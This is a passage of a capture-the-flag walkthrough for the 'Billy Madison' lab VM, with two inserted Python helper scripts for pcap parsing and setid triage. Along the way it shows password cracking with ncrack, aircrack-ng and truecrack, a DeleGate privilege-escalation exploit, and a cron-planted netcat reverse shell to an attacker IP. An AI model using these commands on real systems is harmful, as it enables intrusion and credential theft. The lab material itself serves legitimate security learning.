S-1-22-1-1000 Unix User\billy (Local User)
S-1-22-1-1001 Unix User\veronica (Local User)
S-1-22-1-1002 Unix User\eric (Local User)

Connecting to the Samba share I pulled down the files listed. The ebd.txt file stated that the backdoor was closed (more on that later).

root@mrb3n:~# smbclient //192.168.110.181/EricsSecretStuff -u anonymous
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Thu Aug 25 10:16:19 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Thu Aug 25 10:16:19 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

59164 blocks of size 524288. 50914 blocks available

smb: \> get ebd.txt 
getting file \ebd.txt of size 35 as ebd.txt (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get ._.DS_Store 
getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 403.4 KiloBytes/sec)
smb: \> get .DS_Store 
getting file \.DS_Store of size 6148 as .DS_Store (1200.8 KiloBytes/sec) (average 669.2 KiloBytes/sec)

root@mrb3n:~/Desktop/billymadison# cat ebd.txt 

Erics backdoor is currently CLOSED

The string ‘rkfpuzrahngvat’ obtained from the telnet banner earlier was interesting and appeared to be some sort of encrypted or ciphered text. In the end it proved to be ROT13, decoding to ‘exschmenuating’. I tried this in various combinations of username and password without success. Eventually I took a long shot and attempted it as a page name and got a hit! Eric’s admin console!

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/

<TITLE>Eric's Admin Console 1.0</TITLE>
<html>
<h1>"Ruin Billy Madison's Life" - Eric's notes</h1>
<p>
<center><h1>08/01/16</h1></center>
Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life.  Will ponder other victims.

<center><h1>08/02/16</h1></center>
Ah!  Genius thought!  Billy's girlfriend Veronica uses his machine too.  I might have to cook up a phish and see if I can't get her to take the bait.

<center><h2>08/03/16</h2></center>
OMg LOL LOL LOL!!!  What a twit - I can't believe she fell for it!!  I .captured the whole thing in this folder for later lulz.  I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks!

Anyway, malware installation successful.  I'm now in complete control of Bill's machine!

<center>
<center><h1>Log monitor</h1></center>
<p>
<center>This will help me keep an eye on Billy's attempt to free his machine from my wrath.</center>
<p>
<center><a href="currently-banned-hosts.txt">View log</a>
<p>
</html>

Checking out the ‘currently-banned-hosts.txt’ file confirms that I have been banned multiple times while trying to connect via telnet. The file also offers a hint to reset the VM to remove the ban.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-13-59-01
Hosts currently banned
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---
Chain INPUT (policy DROP)
DROP       all  --  192.168.110.179      anywhere            
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.

I reset the VM and checked the ban list again.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-14-08-01
Hosts currently banned
Chain INPUT (policy DROP)
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---

From the clue on the page above it seems like I may be looking for a packet capture file with ‘veronica’ in the file name. I tried many combinations, ultimately finding the file with wfuzz and a custom wordlist derived from rockyou.txt.

root@mrb3n:~/Desktop/billymadison# cat /root/rockyou.txt | grep veronica > veronica.txt
root@mrb3n:~/Desktop/billymadison# wfuzz  -c -z file,/root/Desktop/billymadison/veronica.txt --hc 404 http://192.168.110.181/exschmenuating/FUZZ.cap 
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.110.181/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00521:  C=400     10 L	      35 W	    307 Ch	  "veronica$%"
00716:  C=200    192 L	     722 W	   8700 Ch	  "012987veronica"
00723:  C=200     24 L	     135 W	    940 Ch	  "#0104veronica"

Total time: 0.705309
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 1095.972

We are able to analyze packet capture files using the tshark command line utility. A quick bash script will pull each separate TCP stream out into its own .cap file.

#!/bin/bash
# Write each TCP stream of the capture to its own file (stream-N.cap).
# tcp.stream is empty for non-TCP packets, so drop blank lines before sorting.
for stream in $(tshark -r 012987veronica.cap -T fields -e tcp.stream | grep -v '^$' | sort -nu)
do
    echo "$stream"
    tshark -r 012987veronica.cap -w "stream-$stream.cap" -Y "tcp.stream==$stream"
done

The packet capture contained 6 separate email messages.
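The tshark loop above and the messages it yielded are what the following reader reproduces without tshark. This is an added example, not code from the walkthrough: a parser for classic pcap files (pcapng is not handled) that reassembles each TCP direction by sequence number, counts a retransmitted segment only once, and pulls out the SMTP message bodies, meaning everything a client sent between DATA and the lone ‘.’ line. All function names (iter_frames, reassemble_streams, extract_smtp_messages and so on) are mine, and the capture it reads by default is constructed in-line by make_sample_pcap(); pass a real capture as the first argument to read that instead.

```python
# Added example: dependency-free pcap reader that reassembles TCP streams and extracts SMTP bodies.
import struct
from collections import defaultdict

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6

def iter_frames(pcap):
    """Yield the raw link-layer frames stored in a classic (libpcap, not pcapng) capture."""
    (magic,) = struct.unpack_from("<I", pcap, 0)
    if magic not in (0xA1B2C3D4, 0xD4C3B2A1):
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    offset = 24  # size of the global header
    while offset + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, offset)
        offset += 16
        yield pcap[offset:offset + incl_len]
        offset += incl_len

def parse_tcp(frame):
    """Return ((src, sport, dst, dport), seq, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != IPPROTO_TCP:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
    data_offset = (tcp[12] >> 4) * 4
    return (src, sport, dst, dport), seq, tcp[data_offset:]

def reassemble_streams(pcap):
    """Map each (src, sport, dst, dport) direction to its payload bytes in sequence order.
    Segments are keyed by sequence number, so a retransmission is only counted once."""
    segments = defaultdict(dict)
    for frame in iter_frames(pcap):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        key, seq, payload = parsed
        if payload:
            segments[key].setdefault(seq, payload)
    return {key: b"".join(p for _, p in sorted(segs.items())) for key, segs in segments.items()}

def extract_smtp_messages(stream):
    """Return the message bodies a client sent between DATA and the terminating '.' line."""
    messages, body, in_data = [], [], False
    for line in stream.split(b"\r\n"):
        if not in_data:
            in_data = line.upper() == b"DATA"
        elif line == b".":
            messages.append(b"\r\n".join(body).decode("utf-8", "replace"))
            body, in_data = [], False
        else:
            body.append(line[1:] if line.startswith(b"..") else line)  # undo SMTP dot-stuffing
    return messages

def smtp_messages_from_pcap(pcap):
    """Map every stream direction that carried SMTP messages to the list of message bodies."""
    result = {}
    for key, stream in reassemble_streams(pcap).items():
        messages = extract_smtp_messages(stream)
        if messages:
            result[key] = messages
    return result

def _frame(src, sport, dst, dport, seq, payload):
    """Build a minimal Ethernet/IPv4/TCP frame (checksums left zero; fine for parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split("."))) + tcp
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip

def make_sample_pcap():
    """Constructed capture: one SMTP client direction split over two segments, written out of
    order and with the first segment retransmitted, to exercise the reassembly."""
    client = ("10.0.0.5", 40000, "10.0.0.9", 2525)
    seg1 = b"EHLO mail\r\nMAIL FROM:<a@example.test>\r\nRCPT TO:<b@example.test>\r\nDATA\r\n"
    seg2 = b"Subject: hi\r\n\r\nMy kid will be a soccer player\r\n..dots\r\n.\r\nQUIT\r\n"
    frames = [_frame(*client, 1000 + len(seg1), seg2), _frame(*client, 1000, seg1), _frame(*client, 1000, seg1)]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1471700000 + i, 0, len(frame), len(frame)) + frame
    return out

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample_pcap()
    for (src, sport, dst, dport), bodies in smtp_messages_from_pcap(data).items():
        for body in bodies:
            print(f"--- {src}:{sport} -> {dst}:{dport} ---\n{body}\n")
```

On a real capture this yields the client-to-server half of each SMTP session keyed by its 4-tuple; the server’s replies sit in the reverse-direction stream, which extract_smtp_messages ignores because it never sees a DATA command there. Keying segments by sequence number is also what keeps a retransmitted segment from being appended twice.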

Message 1

Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just <a href="http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php">click here</a> to install it, k?  

Thanks. -Eric

Message 2

Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.



-VV

Message 3

Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

Message 4

Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric

Message 5

Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

Message 6

Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V

There is a lot of information here, the most important being in messages 2 and 3. The “Spanish Armada” combo in message 2 alludes to port knocking. In the YouTube clip provided, Billy guesses the year of the Spanish Armada with the following sequence: 1466, 1467, 1469, 1514, 1981, 1986. However, listening carefully, he actually says “67”, not 1467. We can use nmap for some port knocking with the combo provided.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.110.181; done

Once completed I checked and sure enough port 21 was now open. Logging in with the credentials from message 3 gave us our next clue.

The FTP directory contained a notes file as well as various exploits from Exploit-DB for Ubuntu 16.04, which were likely trolls, but I saved them for later just in case.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp 740 Aug 22 21:18 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773

The .notes file refers to the privilege escalation exploits (one of them being installed “backwards”, more on that later), hints at how to open Eric’s backdoor, and mentions Billy and Veronica’s account passwords.

root@mrb3n:~/Desktop/billymadison# cat .notes 
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

From some earlier testing I knew that I could send emails over port 2525 via telnet and that the email file would then appear in the EricsSecretStuff Samba share. I crafted an email with the phrase “My kid will be a soccer player” in the body, waited a bit and checked. Sure enough the ebd file now stated that the backdoor was open.

root@mrb3n:~/Desktop/billymadison# telnet 192.168.72.155 2525
Trying 192.168.72.155...
Connected to 192.168.72.155.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
MAIL FROM: vvaugh@polyfector.edu
250 Ok
RCPT TO: eric@madisonhotels.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player

.
250 Ok

Email received

root@mrb3n:~# smbclient //192.168.72.155/EricsSecretStuff
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Fri Aug 26 10:57:38 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  260816095738178.eml                 N       95  Fri Aug 26 10:57:38 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       53  Fri Aug 26 11:00:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

		59164 blocks of size 524288. 50881 blocks available
smb: \> get 260816095738178.eml 
getting file \260816095738178.eml of size 95 as 260816095738178.eml (30.9 KiloBytes/sec) (average 30.9 KiloBytes/sec)
smb: \> ^Z
[1]+  Stopped                 smbclient //192.168.72.155/EricsSecretStuff
root@mrb3n:~# cat 260816095738178.eml 
        Fri, 26 Aug 2016 09:57:14 -0500 (CDT)

SUBJECT: email

My kid will be a soccer player

Backdoor now open.

root@mrb3n:~# cat ebd.txt 
2016-08-26-10-03-01
Erics backdoor is currently OPEN

Another nmap scan shows us a newly opened port 1974.

PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   open   telnet
69/tcp   open   tftp
80/tcp   open   http
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds

Scanning port 1974 with nmap revealed that the backdoor was an SSH service.

root@mrb3n:~# nmap -sV -p 1974 192.168.72.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-08-26 11:43 EDT
Nmap scan report for 192.168.72.155
Host is up (0.00062s latency).
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:44:13:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We now have an SSH service and a username (eric) but no password. Reading back through the hints we see that there must be a user account for billy or veronica on one of the previously opened services. Since we have a previously generated wordlist for Veronica I gave it a go with ncrack against the FTP service.

root@mrb3n:~/Desktop/billymadison# ncrack -u veronica -P veronica.txt -T 5 192.168.72.155 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2016-08-26 11:59 EDT

Discovered credentials for ftp on 192.168.72.155 21/tcp:
192.168.72.155 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 188.98 seconds.

Logging into the FTP server as Veronica we have another email and another packet capture file. Note: you have to switch to binary mode once logged into the FTP server or the packet capture file will not download properly.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap

The email talks about cracking Eric’s wireless password and sure enough the packet capture file is encrypted 802.11 wireless traffic.

root@mrb3n:~/Desktop/billymadison# cat email-from-billy.eml 
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

Armed with our packet capture file and the trusty rockyou.txt wordlist I set to work attempting to crack Eric’s wireless password using aircrack-ng. Some 30 minutes later and I had a hit.

root@mrb3n:~/Desktop/billymadison# aircrack-ng eg-01.cap -w /root/rockyou.txt 
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc3


                   [00:32:35] 1699628 keys tested (897.71 k/s))


                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D 
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC 

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

Finally, after all this time I had a shell. Logging in with eric’s credentials I was on to the next step.

root@mrb3n:~/Desktop/billymadison# ssh eric@192.168.72.155 -p 1974
eric@192.168.72.155's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

12 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ 


eric@BM:~$ cat why-1974.txt 
Why 1974?  Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/

Beware of trolls!

The author took care to plant many trolls throughout the file system as well as some programs and files to give the appearance of an actual workstation.

eric@BM:/opt/coloradoftp-prime/home/anonymous$ cat Billys-12th-grade-final-project.doc 
HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!!  WHAT A LOSER! Why don't you go pass
out by the pool for another hour!

-EG

I guess billy works as a pentester?

eric@BM:/opt# ls
bpatty             fakesmtp    reconng  Sn1per   wp
coloradoftp-prime  honeyports  rg       testssl

Privilege escalation

I spent a great deal of time enumerating the file system. I could see that billy had sudo privileges and that there was a directory named ‘/PRIVATE’ owned by root. At this point I knew that I had to become root to move forward. None of the privilege escalation exploits alluded to in the FTP directory worked, nor was I able to guess billy’s password.

I performed all the normal checks for world-writable files and SUID/SGID binaries, and one stood out.

root@BM:/opt/bpatty# find / -perm -2000 -type f 2>/dev/null
/usr/local/share/sgml/donpcgd
/usr/bin/chage
/usr/bin/wall
/usr/bin/screen
/usr/bin/mlocate
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/at
/usr/bin/ssh-agent
/usr/lib/x86_64-linux-gnu/utempter/utempter
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd

The binary in /usr/local/share/sgml appeared out of place. I pulled it down, opened it in IDA and confirmed that it was not a custom binary made for this challenge. This brought me back to the hint about one of the exploits being installed backwards: if we reverse the name of this binary to “dgcpond” we have a likely candidate, the local privilege escalation in DeleGate v9.9.13 (https://www.exploit-db.com/exploits/39134), which sets some binaries as SUID root (in this case SGID). Per the exploit’s explanation, the “dgcpond” binary creates a node that allows a local, unprivileged user to create files anywhere on the disk, meaning we can create a file in ANY directory, even those owned by root. Creating a shell script in the /etc/cron.hourly directory should help us escalate privileges, as any executable shell script in that directory will be run as root at 17 minutes past every hour.
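What made donpcgd stand out was not its permission bits (several legitimate SGID helpers share them) but its location and the fact that no package owns it. The following is an added example, my own code and not part of the walkthrough, that turns that triage into a repeatable check: scan_setid() walks a filesystem like the find command above, dpkg_owned_paths() builds the package-owned baseline from dpkg’s .list files (Debian/Ubuntu only), and triage() reports set-id files that are unpackaged, sit outside the usual system directories, or are writable by others. The sample input in sample_from_walkthrough() uses the paths from the find output, but its modes, owners and the package-owned set are assumptions, not values from the box; run it with --scan to check the host it is executed on.

```python
# Added example: triage setuid/setgid files against a package-owned baseline (not the walkthrough's code).
import os
import stat
import sys
from typing import NamedTuple


class SetIdFile(NamedTuple):
    path: str
    mode: int  # st_mode bits
    uid: int
    gid: int


# Where distro-packaged set-id helpers normally live (assumption: Debian/Ubuntu layout).
EXPECTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def scan_setid(root="/"):
    """Walk root and return every regular file with the setuid or setgid bit set
    (the same set as `find / -perm /6000 -type f`)."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(SetIdFile(path, st.st_mode, st.st_uid, st.st_gid))
    return found


def dpkg_owned_paths(info_dir="/var/lib/dpkg/info"):
    """Every path listed in dpkg's per-package .list files (Debian/Ubuntu); empty elsewhere."""
    owned = set()
    if os.path.isdir(info_dir):
        for name in os.listdir(info_dir):
            if name.endswith(".list"):
                with open(os.path.join(info_dir, name), errors="replace") as fh:
                    owned.update(line.rstrip("\n") for line in fh)
    return owned


def triage(files, packaged):
    """Return [(path, [reasons])] for set-id files that deserve a closer look."""
    suspects = []
    for f in files:
        reasons = []
        if f.path not in packaged:
            reasons.append("not owned by any package")
        if not f.path.startswith(EXPECTED_DIRS):
            reasons.append("unusual location")
        if f.mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if f.mode & stat.S_ISUID and f.uid == 0 and f.mode & stat.S_IWGRP:
            reasons.append("setuid-root and group-writable")
        if reasons:
            suspects.append((f.path, reasons))
    return suspects


def sample_from_walkthrough():
    """Constructed input: paths from the find output above; modes, owners and the
    package-owned set are assumed, not taken from the box."""
    sgid = stat.S_IFREG | stat.S_ISGID | 0o755
    files = [
        SetIdFile("/usr/bin/chage", sgid, 0, 42),
        SetIdFile("/usr/bin/wall", sgid, 0, 5),
        SetIdFile("/usr/bin/crontab", sgid, 0, 102),
        SetIdFile("/sbin/unix_chkpwd", sgid, 0, 42),
        SetIdFile("/usr/local/share/sgml/donpcgd", sgid, 0, 0),
    ]
    packaged = {"/usr/bin/chage", "/usr/bin/wall", "/usr/bin/crontab", "/sbin/unix_chkpwd"}
    return files, packaged


if __name__ == "__main__":
    if "--scan" in sys.argv:
        files, packaged = scan_setid("/"), dpkg_owned_paths()
    else:
        files, packaged = sample_from_walkthrough()
    for path, reasons in triage(files, packaged):
        print(path, "->", "; ".join(reasons))
```

On a box like this one the "not owned by any package" and "unusual location" reasons both fire for /usr/local/share/sgml/donpcgd while the dpkg-shipped helpers in /usr/bin and /sbin stay quiet, which is the signal that justified pulling the binary into IDA. The check is only as good as its baseline: a package-manager file list does not prove a file is unmodified, so a hash comparison (for example against dpkg’s md5sums or a file-integrity tool) is the natural next step.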

Modifying the exploit syntax a bit, I created an hourly cron job that sends me a reverse shell using mknod and nc.

eric@BM:/usr/local/share/sgml$ touch /tmp/rootme; chmod +x /tmp/rootme; ./donpcgd /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe' > /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/root,81fd,0)

I confirmed that the hourly cron job had been created, set up my listener and waited.

eric@BM:/etc/cron.hourly$ cat rootme
#!/bin/bash 
 mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

I checked back after 17 past the next hour and I had a hit on my listener. A root shell!

root@mrb3n:~# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.72.154] from (UNKNOWN) [192.168.72.155] 58066
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux BM 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
python -c 'import pty;pty.spawn("/bin/bash")'

root@BM:/#

Establishing persistence

Even after obtaining a better working tty the shell was a bit sluggish. I decided to be a bit dirty and change billy’s password, since I knew that he had sudo privileges. After changing his password I logged back in via SSH and things were much more stable.

root@BM:/# passwd billy
pswd billy
Enter new UNIX password: billy
Retype new UNIX password: billy

Checking out the root directory I found all of the shell scripts the author had carefully set up to troll us/keep us on track. Nicely done!

root@BM:~# ls
checkban    ebd.sh   email.sh  fwconfig.sh  ssh.sh      telnet.sh
cleanup.sh  ebd.txt  ftp.sh    ssh          startup.sh  wp.sh

PRIVATE

Moving over to the /PRIVATE directory I found a hint file as well as an unknown file, which later proved to be a TrueCrypt volume based on the hint "truely cracks me up".

root@BM:/PRIVATE# ls -lah
total 1.1M
drwx------  2 root  root  4.0K Aug 21 16:45 .
drwxr-xr-x 25 root  root  4.0K Aug 20 13:59 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   191 Aug 21 16:45 hint.txt


root@BM:/PRIVATE# cat hint.txt 
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

I pulled the TrueCrypt volume down locally and created a wordlist using cewl and the Wikipedia link provided.

root@mrb3n:~/Desktop/billymadison# cewl -v en.wikipedia.org/wiki/Billy_Madison -d 1 -w billy_madison.txt

When using cewl and Wikipedia to create wordlists we are left with lots of junk. The following command can be used to clean things up a bit.

root@mrb3n:~/Desktop/billymadison# cat billy_madison.txt | grep "\w\{7,\}" | grep -v "^wg" | head -n -50 > short_billy_madison.txt

Next I fired up truecrack against the truecrypt volume using the shiny new wordlist. 236 attempts in and we had a hit.

root@mrb3n:~/Desktop/billymadison# truecrack -t BowelMovement -w /root/rockyou.txt -v

231	inspired	NO
232	ignores		NO
233	initially	NO
234	calling		NO
235	execrable	YES
Found password:		"execrable"
Password length:	"10"
Total computations:	"236"

Now I had a password, but I still had to mount the TrueCrypt volume to see what the author had in store for us next. Kali Linux comes with cryptsetup, which can be used to access a TrueCrypt container if we don't have TrueCrypt installed. The following command will open the TrueCrypt container (after we enter the password).

root@mrb3n:~/Desktop/billymadison# cryptsetup open --type tcrypt /root/Desktop/billymadison/BowelMovement billy
Enter passphrase: 

Once open, we can mount the TrueCrypt container at a mountpoint of our choosing.

